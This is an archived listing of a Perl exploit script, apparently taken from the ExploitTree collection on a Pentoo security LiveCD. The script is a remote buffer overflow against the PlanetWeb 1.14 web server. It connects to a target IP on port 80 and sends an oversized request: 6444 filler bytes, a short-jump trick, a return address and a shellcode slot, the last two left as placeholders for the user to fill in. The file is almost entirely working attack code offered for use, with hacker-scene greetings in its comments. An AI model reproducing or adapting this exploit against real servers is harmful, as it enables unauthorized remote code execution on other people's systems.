home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / planetweb / planetweb-longrequest-ex.pl < prev   
Perl Script  |  2005-02-12  |  898b  |  26 lines

  1. #!/usr/bin/perl -w
  2. #tool bop.pl
  3. # buffer overflow tested against plaetweb v1.14
  4. # humm..this exploit is not for lamers...
  5. # Greetz: marocit and #crack.fr (specialemet christal...plus tu pΘdales moins fort, moins tu #avances plus vite..)
  6. #
  7.  
  8. use IO::Socket;
  9. if ($#ARGV<0)
  10. {
  11.  print "\n write the target IP!! \n\n";
  12.  exit;
  13. }
  14.  
  15. $shellcode =
  16. ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#add your favorit shellcode
  17. $buffer = "A"x6444;
  18. $ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
  19. $ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
  20. $minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
  21. $connect = IO::Socket::INET ->new (Proto=>"tcp",
  22. PeerAddr=> "$ARGV[0]",
  23. PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
  24. print $connect "$buffer$ebx$ret$minibuf$shellcode";
  25. print "\nsending exploit......\n\n";
  26.